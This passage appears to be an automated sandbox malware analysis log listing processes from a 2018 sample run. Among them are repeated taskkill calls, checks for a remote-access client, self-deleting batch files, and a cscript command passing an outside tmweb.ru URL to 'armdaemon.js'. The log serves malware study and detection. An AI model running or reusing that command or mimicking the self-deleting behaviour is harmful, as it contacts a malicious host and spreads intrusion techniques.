Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0xc0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2024 Parent PID: 2948

General

Start time:	10:34:16
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x9c0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: explorer.exe PID: 2168 Parent PID: 548

General

Start time:	10:34:17
Start date:	30/08/2018
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding
Imagebase:	0xc0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 2160 Parent PID: 2256

General

Start time:	10:34:17
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c 'cscript /nologo C:\inst_fold\armdaemon.js 'http://ca80628.tmweb.ru/f.php?data=000-000-000-000&id_k=1''
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: dllhost.exe PID: 2708 Parent PID: 548

General

Start time:	10:34:20
Start date:	30/08/2018
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Imagebase:	0x490000
File size:	7168 bytes
MD5 hash:	A63DC5C2EA944E6657203E0C8EDEAF61
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2140 Parent PID: 2948

General

Start time:	10:34:22
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x4d0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cscript.exe PID: 2364 Parent PID: 2160

General

Start time:	10:34:23
Start date:	30/08/2018
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript /nologo C:\inst_fold\armdaemon.js 'http://ca80628.tmweb.ru/f.php?data=000-000-000-000&id_k=1'
Imagebase:	0xfe0000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3252 Parent PID: 2948

General

Start time:	10:34:24
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x380000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 2312 Parent PID: 1032

General

Start time:	10:34:25
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3 /nobreak
Imagebase:	0xd70000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2080 Parent PID: 2948

General

Start time:	10:34:25
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xea0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2064 Parent PID: 2948

General

Start time:	10:34:26
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x4d0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 728 Parent PID: 2948

General

Start time:	10:34:26
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x190000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2752 Parent PID: 2948

General

Start time:	10:34:26
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x150000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2748 Parent PID: 2948

General

Start time:	10:34:27
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xf00000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2220 Parent PID: 2948

General

Start time:	10:34:27
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x3f0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2196 Parent PID: 2948

General

Start time:	10:34:27
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x4d0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2180 Parent PID: 2948

General

Start time:	10:34:28
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x7f0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 1580 Parent PID: 1032

General

Start time:	10:34:28
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:	0xdd0000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 1904 Parent PID: 1032

General

Start time:	10:34:28
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:	0x240000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2888 Parent PID: 2948

General

Start time:	10:34:29
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xcd0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3096 Parent PID: 2948

General

Start time:	10:34:31
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xdc0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2344 Parent PID: 2948

General

Start time:	10:34:31
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x450000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2092 Parent PID: 2948

General

Start time:	10:34:32
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x820000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2588 Parent PID: 2948

General

Start time:	10:34:32
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x7f0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3248 Parent PID: 3256

General

Start time:	10:34:33
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' '
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3240 Parent PID: 2948

General

Start time:	10:34:33
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xca0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 3324 Parent PID: 1032

General

Start time:	10:34:33
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3 /nobreak
Imagebase:	0x20000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3208 Parent PID: 3256

General

Start time:	10:34:34
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat' '
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 3320 Parent PID: 3248

General

Start time:	10:34:34
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	ATTRIB -r '\\?\C:\Users\HERBBL~1\AppData\Roaming\Adobe\ADOBER~1.1\install\setup.msi'
Imagebase:	0xb70000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3384 Parent PID: 2948

General

Start time:	10:34:34
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x250000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 780 Parent PID: 3208

General

Start time:	10:34:35
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	ATTRIB -r '\\?\C:\Users\HERBBL~1\AppData\Roaming\Adobe\ADOBER~1.1\install\setup.msi'
Imagebase:	0xb70000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 524 Parent PID: 3248

General

Start time:	10:34:35
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	ATTRIB -r 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat'
Imagebase:	0xc0000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 836 Parent PID: 2948

General

Start time:	10:34:35
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x50000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 3508 Parent PID: 3208

General

Start time:	10:34:35
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	ATTRIB -r 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat'
Imagebase:	0xb70000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3216 Parent PID: 3248

General

Start time:	10:34:35
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c' del 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' '
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3540 Parent PID: 2948

General

Start time:	10:34:36
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xcd0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3460 Parent PID: 3208

General

Start time:	10:34:36
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c' del 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat' '
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 1952 Parent PID: 3248

General

Start time:	10:34:36
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c' cls'
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1920 Parent PID: 2948

General

Start time:	10:34:36
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x450000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3724 Parent PID: 3208

General

Start time:	10:34:36
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c' cls'
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1964 Parent PID: 2948

General

Start time:	10:34:37
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xe10000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3504 Parent PID: 2948

General

Start time:	10:34:38
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xcd0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 3756 Parent PID: 1032

General

Start time:	10:34:38
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:	0x900000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 3052 Parent PID: 1032

General

Start time:	10:34:38
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:	0x100000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 532 Parent PID: 2948

General

Start time:	10:34:38
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xd00000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3524 Parent PID: 2948

General

Start time:	10:34:39
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x980000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 512 Parent PID: 2948

General

Start time:	10:34:39
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xfb0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3128 Parent PID: 2948

General

Start time:	10:34:40
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x100000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 244 Parent PID: 1032

General

Start time:	10:34:40
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3 /nobreak
Imagebase:	0xb10000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 988 Parent PID: 2948

General

Start time:	10:34:40
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xea0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2804 Parent PID: 2948

General

Start time:	10:34:41
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xde0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3888 Parent PID: 2948

General

Start time:	10:34:41
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xa40000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3936 Parent PID: 2948

General

Start time:	10:34:42
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xf50000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 544 Parent PID: 2948

General

Start time:	10:34:42
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xc40000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3516 Parent PID: 2948

General

Start time:	10:34:42
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x130000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3120 Parent PID: 2948

General

Start time:	10:34:43
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x5e0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 448 Parent PID: 1032

General

Start time:	10:34:43
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:	0xf70000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 2224 Parent PID: 1032

General

Start time:	10:34:43
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:	0xc40000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3456 Parent PID: 2948

General

Start time:	10:34:43
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x450000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2620 Parent PID: 2948

General

Start time:	10:34:44
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xf30000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2104 Parent PID: 2948

General

Start time:	10:34:44
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x610000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1708 Parent PID: 2948

General

Start time:	10:34:45
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xe50000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2272 Parent PID: 2948

General

Start time:	10:34:45
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x560000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 2292 Parent PID: 1032

General

Start time:	10:34:46
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3 /nobreak
Imagebase:	0x430000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1340 Parent PID: 2948

General

Start time:	10:34:46
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xce0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3884 Parent PID: 2948

General

Start time:	10:34:46
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x420000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 248 Parent PID: 2948

General

Start time:	10:34:46
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xec0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

